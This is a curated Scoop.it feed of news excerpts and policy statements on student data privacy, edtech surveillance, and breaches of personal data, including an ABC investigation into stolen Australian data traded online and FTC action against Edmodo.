“We have outsourced our collective imagination and our vision as to what innovation with technology could be to third-party product offerings that aren’t remotely close to the classroom and don’t have our best interests at heart,” Fitzgerald said.

“The conversation the industry wants us to have is: What’s the harm?” he added. “The right conversation, the ethical conversation is: What’s the need? Why does a fourth-grader need to be tracked by a third-party vendor to learn math?”

 

 

Abby Rufer, a high school algebra teacher in Dallas, said she’s worked with a few of the tested apps and many others during a frustratingly complicated two years of remote education.

School districts felt pressured during the pandemic to quickly replace the classroom with online alternatives, she said, but most teachers didn’t have the time or technical ability to uncover how much data they gobbled up.

“If the school is telling you to use this app and you don’t have the knowledge that it might be recording your students’ information, that to me is a huge concern,” Rufer said.

Many of her students are immigrants from Latin America or refugees from Afghanistan, she said, and some are already fearful of how information on their locations and families could be used against them.

“They’re being expected to jump into a world that is all technological,” she said, “and for many of them it’s just another obstacle they’re expected to overcome.” 

 

For original post, please visit: 
https://www.washingtonpost.com/technology/2022/05/24/remote-school-app-tracking-privacy/ 

Rocio Liliana Rosas De Silva's curator insight, May 28, 2024 7:29 PM
Some educational tools were recommended by school districts; the article mentions that COVID opened the door to this new era, and on this website you can check the benefits of studying remotely.
Scooped by Roxana Marachi, PhD
November 27, 2022 6:53 PM

Cyber black market selling hacked ATO and MyGov logins shows Medibank and Optus only tip of iceberg // ABC News


By Sean Rubinsztein-Dunlop, Echo Hui, Sarah Curnow and Kevin Nguyen

 

"The highly sensitive information of millions of Australians — including logins for personal Australian Tax Office accounts, medical and personal data of thousands of NDIS recipients, and confidential details of an alleged assault of a Victorian school student by their teacher — is among terabytes of hacked data being openly traded online.

 

An ABC investigation has identified large swathes of previously unreported confidential material that is widely available on the internet, ranging from sensitive legal contracts to the login details of individual MyGov accounts, which are being sold for as little as $1 USD.

 

The huge volume of newly identified information confirms the high-profile hacks of Medibank and Optus represent just a fraction of the confidential Australian records recently stolen by cyber criminals.

 

At least 12 million Australians have had their data exposed by hackers in recent months.

It can also be revealed many of those impacted learnt they were victims of data theft only after being contacted by the ABC.

 

They said they were either not adequately notified by the organisations responsible for securing their data, or were misled as to the gravity of the breach.

 


 

One of the main hubs where stolen data is published is a forum easily discoverable through Google, which only appeared eight months ago and has soared in popularity — much to the alarm of global cyber intelligence experts.

 

Anonymous users on the forum and similar websites regularly hawk stolen databases collectively containing millions of Australians' personal information.

 

Others were seen offering generous incentives to those daring enough to go after specific targets, such as one post seeking classified intelligence on the development of Australian submarines.

 

"There's a criminal's cornucopia of information available on the clear web, which is the web that's indexed by Google, as well as in the dark web," said CyberCX director of cyber intelligence Katherine Mansted.

 

"There's a very low barrier of entry for criminals … and often what we see with foreign government espionage or cyber programs — they're not above buying tools or buying information from criminals either."

 

In one case, law student Zac's medical information, pilfered in one of Australia's most troubling cyber breaches, was freely published by someone without a clear motive.

 

Zac has a rare neuromuscular disorder which has left him unable to walk and prone to severe weakness and fatigue. The ABC has agreed not to use his full name because he fears the stolen information could be used to locate him.

 

His sensitive personal data was stolen in May in a cyber attack on CTARS, a company that provides a cloud-based client management system to National Disability Insurance Scheme (NDIS) and NSW out-of-home-care service providers.

 

The National Disability Insurance Agency (NDIA), which is responsible for the NDIS, told a Senate committee it had confirmed with CTARS that all 9,800 affected participants had been notified. 

 

But ABC Investigations has established this is not the case. The ABC spoke with 20 victims of the breach; all but one — who later found a notice in her junk mail — said they had not received a notification or even heard of the hack.

 

The leaked CTARS database, verified by the ABC, included Medicare numbers, medical information, tax file numbers, prescription records, mental health diagnoses, welfare checks, and observations about high-risk behaviour such as eating disorders, self-harm and suicide attempts.

 

"It's really, really violating," said Zac, whose leaked data included severe allergy listings for common food and medicine,

"I may not like to think of myself as vulnerable … but I guess I am quite vulnerable, particularly living alone.

"Allergy records, things that are really sensitive, [are kept] private between me and my doctor and no one else but the people who support me.

 

"That's not the sort of information that you want getting into the wrong hands, particularly when ... you don't have a lot of people around you to advocate for you."

 

The CTARS database is just one of many thousands being traded on the ever-growing cybercrime black market. These postings appear on both the clear web — used every day through common web browsers — and on the dark web, which requires special software for access.

 

The scale of the problem is illustrated by the low prices being demanded for confidential data.

ABC Investigations found users selling personal information and log-in credentials to individual Australian accounts, including MyGov, the ATO and Virgin Money, for between $1 and $10 USD.

 

MyGov and ATO services are built with two-factor authentication, which protects accounts with compromised usernames and passwords, but those same login details could be used as a means to bypass less-secure services.

 

One cyber intelligence expert showed the ABC a popular hackers forum, in which remote access to an Australian manufacturing company was auctioned for up to $500. He declined to identify the company.

CyberCX's Ms Mansted said the "black economy" in stolen data and hacking services was by some measures the third largest economy in the world, surpassed only by the US and Chinese GDP.

"The cost of buying a person's personal information or buying access to hack into a corporation, that's actually declining over time, because there is so much information and so much data out there," said Ms Mansted. 

 

Cyber threat investigator Paul Nevin monitors online forums where hundreds of Australians' login data are traded each week.

"The volume of them was staggering to me," said Mr Nevin, whose company Cybermerc runs surveillance on malicious actors and trains Australian defence officials.

 

"In the past, we'd see small scatterings of accounts but now, this whole marketplace has been commoditised and fully automated.

 

"The development of that capability has only been around for a few years but it shows you just how successful these actors are at what they do."

Explosive details leaked about private school


The cyber attack on Medibank last month by Russian criminal group REvil brought home the devastation cyber crime can inflict.

The largest health insurer in the country is now facing a possible class action lawsuit after REvil accessed the data of 9.7 million current and former customers, and published highly sensitive medical information online.

 

On the dark web, Russian and Eastern European criminal organisations host sites where they post ransom threats and later leak databases if the ransom is not paid.

 

The groups research their targets to inflict maximum damage. Victims range from global corporations, including defence firm Thales and consulting company Accenture, to Australian schools. 

 

In Melbourne, the Kilvington Grammar School community is reeling after more than 1,000 current and former students had their personal data leaked in October by a prolific ransomware gang, Lockbit 3.0. 

 

The independent school informed parents via emails, including one on November 2 that stated an "unknown third party has published a limited amount of data taken from our systems". 

Correspondence sent to parents indicated this "sensitive information" included contact details of parents, Medicare details and health information such as allergies, as well as some credit card information.

However, the cache of information actually published by Lockbit 3.0 was far more extensive than initially suggested.

ABC Investigations can reveal the ransomware group published highly confidential documents containing the bank account numbers of parents, legal and debt disputes between the school and families, report cards, and individual test results.

Most shocking was the publication of details concerning the investigation into a teacher accused of assaulting a child and privileged legal advice about the death of a student.

 

Kilvington Grammar has been at the centre of a coronial inquest into Lachlan Cook, 16, who died after suffering complications of Type 1 diabetes during a school trip to Vietnam in 2019.

 

Lachlan became critically ill and started vomiting, which was mistaken for gastroenteritis rather than a rare complication of his diabetes.

 

The coroner has indicated she will find the death was preventable because neither the school nor the tour operator, World Challenge, provided specific care for the teenager's diabetes. 

 

Lachlan's parents declined to comment, but ABC Investigations understands they did not receive notification from the school that sensitive legal documents about his death were stolen and published online.

 

Other parents whose details were compromised told the ABC they were frustrated by the school's failure to explain the scale of the breach.

 

"That's distressing that this type of data has been accessed," said father of two, Paul Papadopoulos.

 

"It's absolutely more sensitive [than parents were told] and I think any person would want to have known about it." 

 

In a statement to the ABC, Kilvington Grammar did not address specific questions about the Cook family tragedy, nor whether any ransom was demanded or paid.

 

The school's marketing director, Camilla Fiorini, acknowledged that its attempt to notify families of exactly which personal data had been stolen was an "imperfect process".

 

"We have adopted a conservative approach and contacted all families that may have been impacted," she said.

 

"We listed — to the best of our abilities —  what data had been accessed ... we also suggested additional steps those individuals can consider taking to further protect their information.

 

"The school is deeply distressed by this incident and the impact it has had on our community." 

 

Other Australian organisations recently targeted by Lockbit 3.0 included a law firm, a wealth management firm for high-net-worth individuals, and a major hospitality company.

Blame game leaves victims out in the cold

The failure of Kilvington Grammar to properly notify the victims of the data theft is not an isolated case, and its targeting by a ransomware group is emblematic of a growing apparatus commoditising stolen personal information.

 

Australian Federal Police (AFP) Cybercrime Operations Commander Chris Goldsmid told the ABC personal data was becoming "increasingly valuable to cybercriminals who see it as information they can exploit for financial gain".

 

"Cybercriminals can now operate at all levels of technical ability and the tools they employ are easily accessible online," he warned.

 

He added that the number of cybercrime incidents had risen 13 per cent from the previous financial year, to 67,500 reports, likely a conservative figure.

 

"We suspect there are many more victims but they are too embarrassed to come forward, or they have not realised what has happened to them is a crime,"

 

Commander Goldsmid said.

While authorities and the Federal Government have warned Medibank customers to be on high alert for identity thieves, many other Australians are unaware they are victims.

 

Under the Privacy Act, all government agencies, organisations that hold health information and companies with an annual turnover above $3 million are required to notify individuals when their data has been breached if it is deemed "likely to cause serious harm".

 

After CTARS was hacked in May, the company published a statement about the breach on its website but devolved responsibility for informing NDIS recipients to the 67 individual service providers affected by the breach.

When ABC Investigations asked CTARS why many of the impacted NDIS recipients were not notified, it said it had decided the process was best handled by each provider.

"The OAIC [Office of the Australian Information Commissioner] suggests that notifications are usually best received from the organisation who has a relationship with impacted individuals — in this case, the service providers," a CTARS spokesperson said.

 

"CTARS worked extensively to support the service providers in being able to ... bring the notification to their clients' attention."

 

However, the NDIA told the ABC this responsibility lay not with those individual providers, but with CTARS.

 

"The Agency's engagement with CTARS following the breach, indicated that CTARS was fulfilling all its obligations under the Privacy Act in relation to the breach," an NDIA spokesperson said.

"The Agency has reinforced with CTARS its obligation to inform users of their services."

 

This has provided little comfort to Zac and other CTARS victims whose personal information may never be erased from the internet.

 

"It's infuriating, it's shocking and it's disturbing," said Zac.

 

"It makes me really angry to know that multiple government agencies and these private support companies, who I would have thought would be duty bound to hold my best interests at heart … especially when my safety is at risk … that they at no level attempted to get in contact with me and assist me in protecting my information."

 

Zac's former service provider, Southern Cross Support Services, did not respond to the ABC's questions.

 

Karen Heath is a victim of another hack published on the same forum as the CTARS data.

 

The Victorian woman has been the victim of two hacks in the past month, one of Optus' customer data and another of confidential information stored by MyDeal, which is owned by retail giant Woolworths Group. 

 

Woolworths told the ABC it has "enhanced" its security and privacy practices since the MyDeal hack and it "unreservedly apologise[d] for the considerable concern the MyDeal breach has caused".

 

But Ms Heath remains anxious.

"You feel a bit helpless [and] you get worried about it," Ms Heath said.

 

"I don't even know that I'll shop at Woolworths again ... they own MyDeal. They have insurance companies, they have all sorts of things.

 

"So where does it end?"

 

For original post, please visit: 

https://amp.abc.net.au/article/101700974 

 
No comment yet.
Scooped by Roxana Marachi, PhD
May 19, 2022 7:10 PM
Scoop.it!

Policy Statement of the Federal Trade Commission on Education Technology // FTC

https://www.ftc.gov/system/files/ftc_gov/pdf/Policy%20Statement%20of%20the%20Federal%20Trade%20Commission%20on%20Education%20Technology.pdf 

No comment yet.
Scooped by Roxana Marachi, PhD
September 6, 2022 9:22 PM
Scoop.it!

Instagram fined €405M for violating kids’ privacy // Politico

Instagram fined €405M for violating kids’ privacy // Politico | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it
The fine is the third for a Meta-owned company handed down by the Irish regulator.

 

https://www.politico.eu/article/instagram-fined-e405m-for-violating-kids-privacy/? 

No comment yet.
Scooped by Roxana Marachi, PhD
August 7, 2022 10:33 PM
Scoop.it!

Digital Game-Based Learning: Foundations, Applications, and Critical Issues // Earl Aguilera and Roberto de Roock, 2022 // Education 

Digital Game-Based Learning: Foundations, Applications, and Critical Issues // Earl Aguilera and Roberto de Roock, 2022 // Education  | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Earl Aguilera and Roberto de Roock

https://doi.org/10.1093/acrefore/9780190264093.013.1438

 

Summary
"As contemporary societies continue to integrate digital technologies into varying aspects of everyday life—including work, schooling, and play—the concept of digital game-based learning (DGBL) has become increasingly influential. The term DGBL is often used to characterize the relationship of computer-based games (including games played on dedicated gaming consoles and mobile devices) to various learning processes or outcomes. The concept of DGBL has its origins in interdisciplinary research across the computational and social sciences, as well as the humanities. As interest in computer games and learning within the field of education began to expand in the late 20th century, DGBL became somewhat of a contested term. Even foundational concepts such as the definition of games (as well as their relationship to simulations and similar artifacts), the affordances of digital modalities, and the question of what “counts” as learning continue to spark debate among positivist, interpretivist, and critical framings of DGBL. Other contested areas include the ways that DGBL should be assessed, the role of motivation in DGBL, and the specific frameworks that should inform the design of games for learning.

Scholarship representing a more positivist view of DGBL typically explores the potential of digital games as motivators and influencers of human behavior, leading to the development of concepts such as gamification and other uses of games for achieving specified outcomes, such as increasing academic measures of performance, or as a form of behavioral modification. Other researchers have taken a more interpretive view of DGBL, framing it as a way to understand learning, meaning-making, and play as social practices embedded within broader contexts, both local and historical. Still others approach DGBL through a more critical paradigm, interrogating issues of power, agency, and ideology within and across applications of DGBL. Within classrooms and formal settings, educators have adopted four broad approaches to applying DGBL: (a) integrating commercial games into classroom learning; (b) developing games expressly for the purpose of teaching educational content; (c) involving students in the creation of digital games as a vehicle for learning; and (d) integrating elements such as scoreboards, feedback loops, and reward systems derived from digital games into non-game contexts—also referred to as gamification.

Scholarship on DGBL focusing on informal settings has alternatively highlighted the socially situated, interpretive practices of gamers; the role of affinity spaces and participatory cultures; and the intersection of gaming practices with the lifeworlds of game players. As DGBL has continued to demonstrate influence on a variety of fields, it has also attracted criticism. Among these critiques is the question of the relative effectiveness of DGBL for achieving educational outcomes. Critiques of the quality and design of educational games have also been raised by educators, designers, and gamers alike. Interpretive scholars have tended to question the primacy of institutionally defined approaches to DGBL, highlighting instead the importance of understanding how people make meaning through and with games beyond formal schooling. Critical scholars have also identified issues in the ethics of DGBL in general and gamification in particular as a form of behavior modification and social control. These critiques often intersect and overlap with criticism of video games in general, including issues of commercialism, antisocial behaviors, misogyny, addiction, and the promotion of violence. Despite these criticisms, research and applications of DGBL continue to expand within and beyond the field of education, and evolving technologies, social practices, and cultural developments continue to open new avenues of exploration in the area."

 

To access original article, please visit:
https://doi.org/10.1093/acrefore/9780190264093.013.1438

No comment yet.
Scooped by Roxana Marachi, PhD
July 18, 2023 7:53 PM
Scoop.it!

Securly Sued Over Surveillance of Students on School Chromebooks // 7/17/23

Securly Sued Over Surveillance of Students on School Chromebooks // 7/17/23 | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

Securly Sued Over Surveillance of Students on School Chromebooks - by Christopher Brown

https://news.bloomberglaw.com/privacy-and-data-security/securly-sued-over-surveillance-of-students-on-school-chromebooks 

 

Court case docket - public complaint file

https://www.bloomberglaw.com/public/desktop/document/BateetalvSecurlyIncDocketNo323cv01304SDCalJul172023CourtDocket?doc_id=X6CKD5LOJEB9EMRO1KU3RFCR8K7

No comment yet.
Scooped by Roxana Marachi, PhD
September 17, 2022 11:48 AM
Scoop.it!

Report – Hidden Harms: The Misleading Promise of Monitoring Students Online // Center for Democracy and Technology 

Report – Hidden Harms: The Misleading Promise of Monitoring Students Online // Center for Democracy and Technology  | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Elizabeth Laird, Hugh Grant-Chapman, Cody Venzke, Hannah Quay-de la Vallee

 

"The pressure on schools to keep students safe, especially to protect them physically and support their mental health, has never been greater. The mental health crisis, which has been exacerbated by the COVID-19 pandemic, and concerns about the increasing number of school shootings have led to questions about the role of technology in meeting these goals. From monitoring students’ public social media posts to tracking what they do in real-time on their devices, technology aimed at keeping students safe is growing in popularity. However, the harms that such technology inflicts are increasingly coming to light. 

 

CDT conducted survey research among high school students and middle and high school parents and teachers to better understand the promise of technologies aimed at keeping students safe and the risks that they pose, as reported by those most directly interacting with such tools. In particular, the research focused on student activity monitoring, the nearly ubiquitous practice of schools using technology to monitor students’ activities online, especially on devices provided by the school. CDT built on its previous research, which showed that this monitoring is conducted primarily to comply with perceived legal requirements and to keep students safe. While stakeholders are optimistic that student activity monitoring will keep students safe, in practice it creates significant efficacy and equity gaps: 

  • Monitoring is used for discipline more often than for student safety: Despite assurances and hopes that student activity monitoring will be used to keep students safe, teachers report that it is more frequently used for disciplinary purposes in spite of parent and student concerns. 

  • Teachers bear considerable responsibility but lack training for student activity monitoring: Teachers are generally tasked with responding to alerts generated by student activity monitoring, despite only a small percentage having received training on how to do so privately and securely. 

  • Monitoring is often not limited to school hours despite parent and student concerns: Students and parents are the most comfortable with monitoring being limited to when school is in session, but monitoring frequently occurs outside of that time frame. 

  • Stakeholders demonstrate large knowledge gaps in how monitoring software functions: There are significant gaps between what teachers report is communicated about student activity monitoring, often via a form provided along with a school-issued device, and what parents and students retain and report about it. 

Additionally, certain groups of students, especially those who are already more at risk than their peers, disproportionately experience the hidden harms of student activity monitoring: 

  • Students are at risk of increased interactions with law enforcement: Schools are sending student data collected from monitoring software to law enforcement officials, who use it to contact students. 

  • LGBTQ+ students are disproportionately targeted for action: The use of student activity monitoring software is resulting in the nonconsensual disclosure of students’ sexual orientation and gender identity (i.e., “outing”), as well as more LGBTQ+ students reporting they are being disciplined or contacted by law enforcement for concerns about committing a crime compared to their peers. 

  • Students’ mental health could suffer: While students report they are being referred to school counselors, social workers, and other adults for mental health support, they are also experiencing detrimental effects from being monitored online. These effects include avoiding expressing their thoughts and feelings online, as well as not accessing important resources that could help them. 

  • Students from low-income families, Black students, and Hispanic students are at greater risk of harm: Previous CDT research showed that certain groups of students, including students from low-income families, Black students, and Hispanic students, rely more heavily on school-issued devices. Therefore, they are subject to more surveillance and the aforementioned harms, including interacting with law enforcement, being disciplined, and being outed, than those using personal devices. 


Given that the implementation of student activity monitoring falls short of its promises, this research suggests that education leaders should consider alternative strategies to keep students safe that do not simultaneously put students’ safety and well-being in jeopardy.


See below for our complete report, summary brief, and in-depth research slide deck. For more information, see our letter calling for action from the U.S. Department of Education’s Office for Civil Rights — jointly signed by multiple civil society groups — as well as our related press release and recent blog post discussing findings from our parent and student focus groups.

Read the full report here.

Read the summary brief here.

Read the research slide deck here.

 
 
No comment yet.
Scooped by Roxana Marachi, PhD
May 22, 2023 9:32 PM
Scoop.it!

FTC Says EdTech Provider Edmodo Unlawfully Used Children’s Personal Information for Advertising and Outsourced Compliance to School Districts

FTC Says EdTech Provider Edmodo Unlawfully Used Children’s Personal Information for Advertising and Outsourced Compliance to School Districts | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

"The Federal Trade Commission has obtained an order against education technology provider Edmodo for collecting personal data from children without obtaining their parent’s consent and using that data for advertising, in violation of the Children’s Online Privacy Protection Act Rule (COPPA Rule), and for unlawfully outsourcing its COPPA compliance responsibilities to schools. 

Under the proposed order, filed by the Department of Justice on behalf of the FTC, Edmodo, Inc. will be prohibited from requiring students to hand over more personal data than is necessary in order to participate in an online educational activity. This is a first for an FTC order and is in line with a policy statement the FTC issued in May 2022 that warned education technology companies about forcing parents and schools to provide personal data about children in order to participate in online education. During the course of the FTC’s investigation, Edmodo suspended operations in the United States. The order, if approved by the court, will bind the company, including if it resumes U.S. operations.

“This order makes clear that ed tech providers cannot outsource compliance responsibilities to schools, or force students to choose between their privacy and education,” said Samuel Levine, Director of the FTC’s Bureau of Consumer Protection. “Other ed tech providers should carefully examine their practices to ensure they’re not compromising students’ privacy.”

In a complaint, also filed by DOJ, the FTC says Edmodo violated the COPPA Rule by failing to provide information about the company’s data collection practices to schools and teachers, and failing to obtain verifiable parental consent. The COPPA Rule requires online services and websites directed to children under 13 to notify parents about the personal information they collect and obtain verifiable parental consent for the collection and use of that information.

Until approximately September 2022, California-based Edmodo offered an online platform and mobile app with virtual class spaces to host discussions, share materials and other online resources for teachers and schools in the United States via a free and subscription-based service. The company collected personal information about students including their name, email address, date of birth and phone number as well as persistent identifiers, which it used to provide ads.

Under the COPPA Rule, schools can authorize collection of children’s personal information on behalf of parents. But a website operator must provide notice to the school of the operator’s collection, use and disclosure practices, and the school can only authorize collection and use of personal information for an educational purpose.

Edmodo required schools and teachers to authorize data collection on behalf of parents or to notify parents about Edmodo’s data collection practices and obtain their consent to that collection. Edmodo, however, failed to provide schools and teachers with the information they would need to comply in either scenario as required by the COPPA Rule, according to the complaint. For example, during the signup process for Edmodo’s free service, Edmodo provided minimal information about the COPPA Rule to teachers—providing only a link to the company’s terms of service and privacy policy, which teachers were not required to review before signing up for the company’s service.

Those teachers and schools that did read Edmodo’s terms of service were falsely told that they were “solely” responsible for complying with the COPPA Rule. The terms of service also failed to adequately disclose what personal information the company actually collects or indicate how schools or teachers should go about obtaining parental consent.

These failures led to the illegal collection of personal information from children, according to the complaint.

In addition, Edmodo could not rely on schools to authorize collection on behalf of parents because the company used the personal information it collected from children for a non-educational purpose—to serve advertising. For such commercial uses, the COPPA Rule required Edmodo to obtain consent directly from parents. 

Edmodo also violated the COPPA Rule by retaining personal information indefinitely until at least 2020 when it put in place a policy to delete the data after two years, according to the complaint. COPPA prohibits retaining personal information about children for longer than is reasonably necessary to fulfill the purpose for which it was collected.

In addition to violating the COPPA Rule, the FTC says Edmodo violated the FTC Act’s prohibition on unfair practices by relying on schools to obtain verifiable parental consent. Specifically, the FTC says that Edmodo outsourced its COPPA compliance responsibilities to schools and teachers while providing confusing and inaccurate information about obtaining consent. This is the first time the FTC has alleged an unfair trade practice in the context of an operator’s interaction with schools.

Proposed Order

The proposed order with Edmodo includes a $6 million monetary penalty, which will be suspended due to the company’s inability to pay. Other order provisions, which will provide protections for children’s data should Edmodo resume operations in the United States, include:

  • prohibiting Edmodo from conditioning a child’s participation in an activity on the child disclosing more information than is reasonably necessary to participate in such activity;

  • requiring the company to complete several requirements before obtaining school authorization to collect information from a child;

  • prohibiting the company from using children’s information for non-educational purposes such as advertising or building user profiles;

  • banning the company from using schools as intermediaries in the parental consent process;

  • requiring the company to implement and adhere to a retention schedule that details what information it collects, what the data is used for and a time frame for deleting it; and

  • requiring Edmodo to delete models or algorithms developed using personal information collected from children without verifiable parental consent or school authorization.

The Commission voted 3-0 to refer the civil penalty complaint and proposed federal order to the Department of Justice. The DOJ filed the complaint and stipulated order in the U.S. District Court for the Northern District of California.

NOTE: The Commission authorizes the filing of a complaint when it has “reason to believe” that the named defendant is violating or is about to violate the law and it appears to the Commission that a proceeding is in the public interest. Stipulated orders have the force of law when approved and signed by the District Court judge.

The lead FTC attorneys on this matter are Gorana Neskovic and Peder Magee from the FTC’s Bureau of Consumer Protection.

The Federal Trade Commission works to promote competition and protect and educate consumers. Learn more about consumer topics at consumer.ftc.gov, or report fraud, scams, and bad business practices at ReportFraud.ftc.gov. Follow the FTC on social media, read consumer alerts and the business blog, and sign up to get the latest FTC news and alerts."

 

For original post, please visit: 

https://www.ftc.gov/news-events/news/press-releases/2023/05/ftc-says-ed-tech-provider-edmodo-unlawfully-used-childrens-personal-information-advertising?utm_source=govdelivery 

No comment yet.
Scooped by Roxana Marachi, PhD
May 2, 2023 9:57 PM
Scoop.it!

Ransomware Gang Claims Edison Learning Data Theft // THE Journal

Ransomware Gang Claims Edison Learning Data Theft // THE Journal | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Kristal Kuykendall 05/02/23

"The Royal Ransomware is claiming to have infiltrated public school management and virtual learning provider Edison Learning, posting on its dark web data leak site on Wednesday, April 26, that it had stolen 20GB of the company’s data “including personal information of employees and students” and threatening to post the data “early next week.”

Typically, when Royal and similar ransomware groups post such warnings, it indicates they have likely made a ransom demand and may be in negotiations with the targeted organization, said cybersecurity expert Doug Levin, who is national director at K12 Security Information Exchange and sits on CISA’s Cybersecurity Advisory Committee.

Edison Learning confirmed a cyber incident has occurred and said it could not divulge anything else. "Our investigation into this incident is ongoing, and we are unable to provide additional details at this time," Edison Learning Director of Communications Michael Serpe told THE Journal in an email. "We do not have any student data on impacted systems." 


Based in Fort Lauderdale, Florida, Edison Learning was founded in 1992 as the Edison Project to provide school management services for public charter schools and struggling districts in the United States and United Kingdom. 

According to an archived 2015 website page, Edison Learning has managed hundreds of schools in 32 states, serving millions of students over the years. A 2012 Edison Learning sales presentation found online by THE Journal states that during the 2009–2010 school year, the company’s services were providing schooling for 400,000 children in 25 states, the U.K., and the United Arab Emirates.

More recently, Edison Learning has expanded to provide virtual schooling for middle and high school students as well as CTE courses for high school students, social-emotional learning courses for middle and high school, and more. The company operates its own in-house learning management system, called eSchoolware, and on its website touts other services such as “management solutions, alternative education, personal learning plans, and turnaround services for underperforming schools.”

The Royal ransomware gang — whose tactics were the subject of a CISA cybersecurity advisory in March 2023 — wrote on its data leak site on the dark web: “Looks like knowledge providers missed some lessons of cyber security [sic]. Recently we gave one to EdisonLearning and they have failed.”

Levin at K12SIX said that while “occasionally, these groups list victims they didn’t actually compromise,” the opposite is true more often than not. For example, on Royal’s data leak site, scores of companies — including a handful of public school districts, community colleges, and universities — are listed as victims targeted since the beginning of this year, and many include links to the stolen data files for the respective victims, who presumably did not pay the ransom.... 

 

For full post, please visit: 

https://thejournal.com/articles/2023/05/01/ransomware-gang-claims-edison-learning-data-theft.aspx?s=the_nu_020523&oly_enc_id=8831J2755401H5M 

No comment yet.
Scooped by Roxana Marachi, PhD
March 27, 2023 2:39 PM
Scoop.it!

TikTok is Not the Only Problem // Electronic Privacy Information Center (EPIC)

TikTok is Not the Only Problem // Electronic Privacy Information Center (EPIC) | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Calli Schroeder, EPIC Senior Counsel and Caitriona Fitzgerald, EPIC Deputy Director

 

"The debate over the national security risk posed by the misuse of personal data, and whether a ban or restructuring of TikTok is a necessary policy intervention, has taken a new twist recently with the Biden administration now demanding that TikTok be sold from its Chinese parent company, ByteDance, and sold to a company based in the United States or face a potential ban in the U.S. The Committee on Foreign Investment in the U.S. (CFIUS) has been conducting a review of TikTok’s foreign ownership and national security concerns surrounding the company’s data processing over the past two years. The recent call by the Administration for separation or prohibition is the latest in a series of proposals to address the threats to national security posed by TikTok.  

The national security concerns voiced by the Administration and members of Congress have largely focused on three issues: 1) the amount and type of user data collected by TikTok; 2) Chinese security law allowing government access to Chinese company-held data on demand; and 3) the potential for the Chinese government to use the app to spread misinformation or censor information critical of China.  

TikTok, like most U.S. tech companies, collects a substantial amount of data about its users, which, according to TikTok’s privacy policy, may include name, age, phone number, email, approximate location, IP addresses, contact lists, messages, biometric identifiers (like face or voiceprints), keystroke patterns, and information gathered from interaction with the app, such as user-generated content, interests, preferences, and associated metadata. It also draws substantial inferences from this data to enrich its user profiles.  

There are concerns that this data could be used by the Chinese government in espionage and surveillance activities. China’s National Intelligence Law, Cybersecurity Law, and other components of the interconnected cybersecurity and law enforcement regulatory package allow the Chinese government broad license to require Chinese companies and citizens to “support, assist, and cooperate” with Chinese intelligence work. Since “intelligence work” remains undefined, this could potentially allow the Chinese government unfettered access to data held by any Chinese company. Should China access TikTok’s user data, there is concern that the information could be used to target individuals for blackmail or as potential spy recruits. There is no evidence that China has accessed this data to date and TikTok’s CEO stated that the company would refuse such requests, but the legal issues remain a concern. 

Finally, concerns have been raised that the Chinese government could use its access to TikTok’s inner workings to pressure the company into censoring content, removing content critical of Chinese government practices, or pushing propaganda, potentially influencing U.S. politics and society.  

Project Texas Proposal 

In the wake of executive orders issued by President Trump in 2020, TikTok drafted a proposal that they hoped would sufficiently address concerns about national security and prevent a ban or divestiture mandate. The plan, dubbed “Project Texas,” would shift certain functions to a U.S.-based TikTok subsidiary that would be governed by an independent board of directors reporting directly to CFIUS. Functions run by the subsidiary would include access to U.S. user data, content moderation, hiring and managing U.S. employees, and all other functions that require processing U.S. user data. Oracle would host this subsidiary, oversee all data transfers, and conduct assessments and security reviews of TikTok software. 

But Project Texas does not solve the privacy issues raised by TikTok’s collection and creation of detailed user profiles. Indeed, Oracle is one of the largest data brokers in the United States. Oracle “claims to sell data on more than 300 [million] people globally, with 30,000 data attributes per individual, covering ‘over 80 percent of the entire US internet population[.]’” In 2020, when the potential TikTok/Oracle partnership was announced, EPIC sent demand letters to Oracle and TikTok calling on Oracle to commit not to sell TikTok user data or merge it with Oracle products. Oracle refused to make such a commitment. The Project Texas proposal is insufficient to protect TikTok users or national security because it exposes the weaknesses of a TikTok ban without the additional protections of a comprehensive privacy law. 

TikTok is just one app in a vast commercial surveillance ecosystem that has been allowed to grow unencumbered over the past two decades due to the lack of a U.S. privacy law. Even if the U.S. bans TikTok, millions of apps would continue to collect the most intimate details about us and profit off of them. The endless web of data brokers who buy and sell data would continue to exist, and foreign adversaries such as China could still obtain Americans’ personal data by simply purchasing it from data brokers on the open market. This is a data privacy crisis with serious national security implications and it is past time for Congress to act.  

Don’t Just Ban One, Regulate Them All: Enact Comprehensive Privacy Legislation 

Comprehensive privacy legislation such as the American Data Privacy and Protection Act (“ADPPA”) would go much farther to protect Americans’ personal data from bad foreign actors than a ban on one app. Here, we break down how the provisions of ADPPA would address the national security concerns being raised by lawmakers this week: 

  • Reduces the volume of personal data collected: The ADPPA’s baseline data minimization rule that requires companies to limit their data collection to what is reasonably necessary and proportionate to provide or maintain a product or service requested by the individual (or pursuant to certain enumerated purposes) will dramatically reduce the data points collected on all Americans. Data that is never collected in the first place cannot be misused, breached, or sold.
  • Limits the flow of personal data to data brokers: ADPPA’s limits on collection and disclosure would reduce the flow of personal data to data brokers, strengthening our national security by cutting off the source of many data sales to foreign adversaries. Additionally, the ADPPA directs the FTC to establish a centralized “Do Not Collect” mechanism. The strict limits on data brokers in ADPPA have led to a flood of lobbying by brokers pushing for weaker standards.  
  • Provides heightened protections for kids and teens: The data minimization rule is even stricter when it comes to sensitive data such as the personal data of minors under 17 years old. Collection of sensitive data is permitted only when strictly necessary and not permitted at all for advertising purposes. Targeted advertising to minors is banned. Strictly limiting the collection and use of the personal data of minors will make all apps safer for kids and teens.    
  • Algorithmic impact assessments: Under the ADPPA, large entities are required to conduct algorithmic impact assessments. These assessments must describe steps the entity has taken or will take to mitigate potential harms from algorithms, including any harms specifically related to individuals under 17 years of age and harms to civil rights. The assessments must be submitted to the Federal Trade Commission and to Congress by request. This will bring transparency to the content recommendation algorithms on TikTok and other apps. 
  • Data security requirements: ADPPA requires entities to adopt reasonable data security practices and procedures that correspond with an entity’s size and activities, as well as the sensitivity of the data involved. Strong data security standards strengthen national security by protecting the personal data that has been collected and ensuring that data is deleted after it is no longer needed for the purpose for which it was collected. 
